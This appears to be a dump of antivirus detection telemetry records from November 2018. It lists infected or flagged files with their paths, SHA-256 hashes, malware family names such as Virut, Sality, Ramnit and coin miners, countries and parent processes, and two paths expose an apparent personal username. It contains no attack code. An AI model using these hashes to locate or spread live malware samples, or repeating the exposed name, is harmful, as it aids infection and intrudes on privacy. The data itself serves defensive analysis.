  Row(detection=Row(filename='spideypc.exe', filepath='K:\\اسبيدر-مان\\SPIDEYPC.EXE', filesize=1536000, name='W32/Virut.Gen.#M1.#R1'), hash='db81618b6aa236269f4bc22cbea77fd4cb910ec9df27848e34f275146e50e1a2', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\AVAST Software\\Avast\\AvastSvc.exe', parentsize=325024, timestamp='2018-11-01T21:07:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='fvjdqlks.exe', filepath='G:\\Files are hidden by Trojan\\RECYCLER\\S-0-7-08-8026522526-7122263011-714661711-6462\\FvjdQlKS.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='bb6eff6c9655c890f0d38ddcffbed35c70e720cd1b4e90472e23ff251161108c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:04:17Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='f07aeda82132ff2c7b6a86eb0aea9453ab494dfba2e123355efa08caff1d12ae', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T05:03:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='cfe744b05bdf540032ed1692c087d5f45285aa061357e440587566d8b3849c7e', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 30.10.2018-31\\CFE744B05BDF540032ED1692C087D5F45285AA061357E440587566D8B3849C7E', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='cfe744b05bdf540032ed1692c087d5f45285aa061357e440587566d8b3849c7e', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:12:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='fusion.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\nso8103.tmp\\Fusion.dll', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\DMR\\Downloads\\152e221a8bef8d2d13c58f995563a1a1\\bdcc004788f23fa84093878d20692eaa\\Fotor3_3.4.1_163.15__win32_x64_official__1_.exe', parentsize=268416568, timestamp='2018-11-01T10:22:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\3\\ypx2rtxpvqt\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline='2 3.1540935543.5bd8cf77df06c', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files (x86)\\Emtak\\311682672.exe', parentsize=670720, timestamp='2018-11-01T08:20:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\jrqeikqwq5m\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T06:15:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-212020-cfa42ac1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_de0729a5\\AVSCAN-20181101-211656-B20B1D6E\\AVSCAN-20181101-212020-CFA42AC1', filesize=576000, name='TR/Dldr.Stantinko.be854f.#M1.#R1'), hash='be854f2a34ba3f398eb409c41f271270079bbd139e4bdd0f203b071e09ea0b3d', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T18:20:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='e6ad0fda4e009e1146308c1ebf80d7d19ece6458454d8a9be850095451926ac0', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 30.10.2018-31\\E6AD0FDA4E009E1146308C1EBF80D7D19ECE6458454D8A9BE850095451926AC0', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='e6ad0fda4e009e1146308c1ebf80d7d19ece6458454d8a9be850095451926ac0', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:14:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-194738-4fd804fb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-194206-2B30998F\\AVSCAN-20181101-194738-4FD804FB', filesize=9216000, name='TR/Strictor.mvpk.#M1.#R1'), hash='d242860cabdb5fcd0bfeeba7e64751f2a37387615fe06bf7c65c0a39b3a1ef08', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:47:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='b2048d05b5c54a9751ef0feb5ca8971018af4c52', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\b2048d05b5c54a9751ef0feb5ca8971018af4c52', filesize=384000, name='HEUR/AGEN.1029347.#M1.#R1'), hash='50266ba7945488fb9c7abaac3be6f428f84d2b07d6076a4735954df907e4373d', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T18:26:19Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='miner.exe', filepath='\\\\?\\C:\\$RECYCLE.BIN\\S-1-5-21-153897562-1265273997-1534562455-1001\\$R6KQHBJ\\bin_3rdparty\\ewbf\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='CA', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T10:20:08Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-131251-1e848cb6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e41ed6c7\\AVSCAN-20181104-130336-F49E60EB\\AVSCAN-20181104-131251-1E848CB6', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='9bae2ceb5837b566649673b6901c8972db02bace8d10a9c9fbdc32fab0b5988f', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:12:49Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='4b525aaa4ae479f3c4bdabc51ca3b966be9d881f74cc7f3e840b73e413ccef6d', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-04T23:42:16Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-115456-b5117518', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_17401827\\AVSCAN-20181104-115359-ADD7ACCB\\AVSCAN-20181104-115456-B5117518', filesize=4992000, name='DR/Delphi.Gen.#M1.#R1'), hash='6effd6351227497ea1e1d697792f0b7050faf5fc051144d52122171fc9a84a0e', metadata=Row(cmdline=None, country='CM', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T10:55:04Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-185931-4cda3678', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_93281605\\AVSCAN-20181104-185920-4A90857C\\AVSCAN-20181104-185931-4CDA3678', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T17:59:31Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-132545-58fad311', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e41ed6c7\\AVSCAN-20181104-130254-F168F468\\AVSCAN-20181104-132545-58FAD311', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='9bae2ceb5837b566649673b6901c8972db02bace8d10a9c9fbdc32fab0b5988f', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:25:43Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='logreader.exe', filepath='\\\\?\\E:\\UFIandroid\\Advan\\!Driver & Tools\\Driver Qualcomm\\Qualcomm Driver\\QRD_USB_Drivers\\QCUSBNetworkCombo\\Qualcomm\\1072QRD\\logReader.exe', filesize=156000, name='W32/Ramnit.C.#M1.#R1'), hash='1a4418c9acc85235bcefb6826575a5e8fa2cca25fe7775cbfbfdc83b6ca7e312', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T09:37:30Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='cc.exe', filepath='D:\\the lasted software\\ANSYS process\\ANSYS Inc\\v120\\fluent\\ntbin\\win64\\cc.exe', filesize=192000, name='W32/Ramnit.CD.#M1.#R1'), hash='18ac69750e5cfc3f7cf1a42e7c197d738810364bbe4e6a13d3c5518b2a6814e2', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe', parentsize=467408, timestamp='2018-11-04T15:11:47Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='flashupdate (1).exe', filepath='C:\\Users\\X\\Downloads\\flashupdate (1).exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='5f28ee2b6f85211912fd7283bc72088a22b75457293cfa31a4b3428ac82f35a4', metadata=Row(cmdline=None, country='TN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2868224, timestamp='2018-11-04T10:15:22Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-150511-40872d5a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3e20eca3\\AVSCAN-20181104-150039-241ADA85\\AVSCAN-20181104-150511-40872D5A', filesize=1088000, name='ADWARE/Wajam.Gen4.#M1.#R1'), hash='35a1793bca7ac7ed87b1c40773377bc44e2666f5835febcc7fcc38d1088276e8', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T14:05:10Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files\\Avira\\Antivirus\\AviraSecurityCenterAgent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='BO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVAST Software\\Avast\\AvastSvc.exe', parentsize=325024, timestamp='2018-11-04T14:19:41Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T18:24:10Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='flashupdate.exe', filepath='C:\\Users\\X\\Downloads\\flashupdate.exe', filesize=1536000, name='TR/Dropper.Gen.#M300.#R3467'), hash='070eb33afc11530df004f70b7d8dd606ab877a41d14e253a01ca5da759365976', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T21:57:25Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='autorun.exe', filepath='h:\\autorun.exe', filesize=384000, name='HEUR/APC.#M1.#R1'), hash='9d68807cc4ef56758891c335832bdc903d14ba45201fb94f172317d71d8c776e', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-04T13:18:44Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='pylori.exe', filepath='\\\\?\\C:\\Program Files (x86)\\Jakes\\pylori.exe', filesize=384000, name='HEUR/AGEN.1029347.#M1.#R1'), hash='53112f2b6c10d984e232910c546905079a1e1147948a69dbe1ed1c66e86c58d2', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T12:58:27Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='wncserve.exe', filepath='\\\\?\\C:\\WorkNC-LicenseServer\\exe\\msw\\wncserve.exe', filesize=1088000, name='HEUR/APC.#M1.#R1'), hash='45b04542f0eade0ffd244589510db60267f875f7e1f4b675591d7a124d4b7be9', metadata=Row(cmdline=None, country='PT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T20:33:22Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='~6e4c7221.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~6e4c7221.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='813279b1aee8249802ea399c68af28e6df334a393b3804d3e11c83e788bc4fc8', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-04T20:08:03Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='4b525aaa4ae479f3c4bdabc51ca3b966be9d881f74cc7f3e840b73e413ccef6d', metadata=Row(cmdline=None, country='HR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-04T08:30:03Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='mediadownloadersetup.exe', filepath='C:\\USERS\\X\\Downloads\\MediaDownloaderSetup.exe', filesize=128000, name='W32/Sality.AG.#M1.#R1'), hash='398c616dea6c4c1737816a498a83300ae1b63497aab83469dd04424e85f688e1', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2868224, timestamp='2018-11-04T17:26:09Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp6317343\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\Downloads\\PowerISO7.exe', parentsize=5097096, timestamp='2018-11-04T08:18:59Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='ist.exe', filepath='C:\\Users\\X\\Desktop\\1-PC\\Internet Secure Tunneling 2.0.0.244\\Ist.exe', filesize=852000, name='TR/Crypt.XPACK.Gen.#M300.#R471'), hash='1a59ca13c65517a7f07e3d05c6b810d7b62ab2231708273e90c83f1fe710547b', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='US', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-04T01:12:31Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-133233-b7ee99d6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b476264d\\AVSCAN-20181104-132959-A269E278\\AVSCAN-20181104-133233-B7EE99D6', filesize=8000, name='JS/Dldr.Locky.BCN.#M1.#R1'), hash='c631e34853300c094c5bac5c053ce94c5f390be817cca0813fc677f1f123291d', metadata=Row(cmdline=None, country='JP', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T04:32:33Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='outside caller 08-26-2016 17e395c.zip', filepath='Outside Caller 08-26-2016 17e395c.zip', filesize=8000, name='HEUR/Suspar.Gen.#M0.#R0'), hash='22f75846c98f01d3c621aff911fa633dd4dc915fe1106ecdf7bc9cbcc811b4cb', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T07:32:38Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-203106-6f9a6bd9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8abaa0b2\\AVSCAN-20181104-185408-ED74E5F5\\AVSCAN-20181104-203106-6F9A6BD9', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='2026dae4954364a3478ca8f77b77ee370789bb13109b3d69eae0a61444eaea68', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:26:34Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='catalog.exe', filepath='F:\\Office 20101\\Catalog.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='NE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3611368, timestamp='2018-11-04T17:19:56Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp001f88bd', filepath='C:\\Windows\\Temp\\tmp0000038e\\tmp001f88bd', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Digitalonnet\\AD-Spider\\ADSpiderEngineNT.exe', parentsize=349080, timestamp='2018-11-04T12:30:53Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='gm5upd.exe', filepath='c:\\users\\X\\appdata\\local\\temp\\gm5upd.exe', filesize=384000, name='HEUR/APC.#M1.#R1'), hash='9bb403827bdf8c1112a659c220caaa0bef77a0c960175bdae55d23ca93973d52', metadata=Row(cmdline=None, country='RO', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\Desktop\\gm5.exe', parentsize=888832, timestamp='2018-11-04T09:01:04Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='kms10.exe', filepath='\\\\?\\C:\\Windows\\KMS10\\KMS10.exe', filesize=2176000, name='SPR/HackKMS.d5c565.#M1.#R1'), hash='d5c56597bf7381a46cd51bc26ff6a004945bc08a2760197ae45b98d904d14268', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T09:08:35Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-152003-9f6b14b1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_436779a9\\AVSCAN-20181104-151638-82CFE55F\\AVSCAN-20181104-152003-9F6B14B1', filesize=1088000, name='Adware/Wajam.aib.#M1.#R1'), hash='08a1a6e9c26d1e8abdc8d0b30128bae529a6373b8a6b1bb45557a5dc0369dd7c', metadata=Row(cmdline=None, country='CH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T14:20:04Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='rnshf0ea.exe', filepath='C:\\Users\\X\\AppData\\Local\\49E93CE4-1432579934-11DF-8465-E7B290356F52\\rnshF0EA.exe', filesize=128000, name='HEUR/AGEN.1029157.#M1.#R1'), hash='248d163a709d044da15cc6be8d75faf3ffef38d473765f0b4b08e6afbe553503', metadata=Row(cmdline='-k secsvcs', country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T20:11:09Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered nolor', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered nolor', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='2f6ebf21da79db0779ace05500bac9a7b4cc61749d8f935cd23fbfcd87822827', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T17:14:06Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp000011ed', filepath='C:\\Windows\\Temp\\tmp00000258\\tmp000011ed', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-04T15:49:16Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-202242-c3d5d295', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_28852188\\AVSCAN-20181104-201807-925018B6\\AVSCAN-20181104-202242-C3D5D295', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T11:22:45Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='autorun.exe', filepath='f:\\autorun.exe', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-04T09:14:53Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='a0001763.exe', filepath='\\\\?\\D:\\System Volume Information\\_restore{380D42AC-7531-4738-9953-A56FA241C116}\\RP1\\A0001763.exe', filesize=896000, name='W32/Sality.Y.#M1.#R1'), hash='197b3537db772a3efc4b9884b6e9ad67a6f963f8f359f3652ff873e0f61ae166', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T08:20:13Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='~b18e0b44.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~b18e0b44.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='2dc4a6400d1cf4303a752df45f2adee492d52cd1ce48c572f991187a1c58e2b3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-04T06:11:52Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='xerces-c_2_6.dll', filepath='C:\\AMD\\Win7-32Bit-Radeon-Software-Adrenalin-Edition-17.12.1-Dec11\\Bin\\xerces-c_2_6.dll', filesize=2864000, name='W32/Ramnit.C.#M1.#R1'), hash='b2baa527e6eca6d855ed2201dfbf65a04a887dd3273fb945b339666e6e5cba06', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\UCBrowser\\Application\\UCBrowser.exe', parentsize=1225616, timestamp='2018-11-04T08:47:24Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='a42f4c907fb82c7d8dd2d208aa53fb501c682ad2', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\a42f4c907fb82c7d8dd2d208aa53fb501c682ad2', filesize=6592000, name='TR/Patched.Gen.#M300.#R3369'), hash='13690b0174da8d1771875e8f06e781fcd7a3dfecee206b8b119bd9baddcfb151', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T08:13:32Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T04:28:30Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='freestudio.exe', filepath='\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-2560936065-792659283-4188751600-1002\\$RXK0Q8O\\extra\\FreeStudio.exe', filesize=62692000, name='PUA/OpenCandy.Gen.#M300.#R6753'), hash='3e2d0d88accb84542d6e2fa118e14a29837f00710cf393205b457e2b72333d41', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T16:41:16Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='outside caller 08-26-2016 17e395c.zip', filepath='Outside Caller 08-26-2016 17e395c.zip', filesize=8000, name='HEUR/Suspar.Gen.#M0.#R0'), hash='22f75846c98f01d3c621aff911fa633dd4dc915fe1106ecdf7bc9cbcc811b4cb', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T08:49:19Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='outside caller 08-26-2016 17e395c.zip', filepath='Outside Caller 08-26-2016 17e395c.zip', filesize=8000, name='HEUR/Suspar.Gen.#M0.#R0'), hash='22f75846c98f01d3c621aff911fa633dd4dc915fe1106ecdf7bc9cbcc811b4cb', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T16:04:18Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='dtsu2pausrv32.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\drp\\DP_Audio_wnt6-x86_1111\\drp\\x86\\S\\Realtek\\2\\DTSU2PAuSrv32.exe', filesize=256000, name='W32/Sality.AG.#M1.#R1'), hash='9747165e934ea35cceeff9e433b43095b25b52a5842a96643eaba52e88b70fc0', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='SA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=21504, timestamp='2018-11-04T12:42:32Z'), dt=datetime.date(2018, 11, 4)),
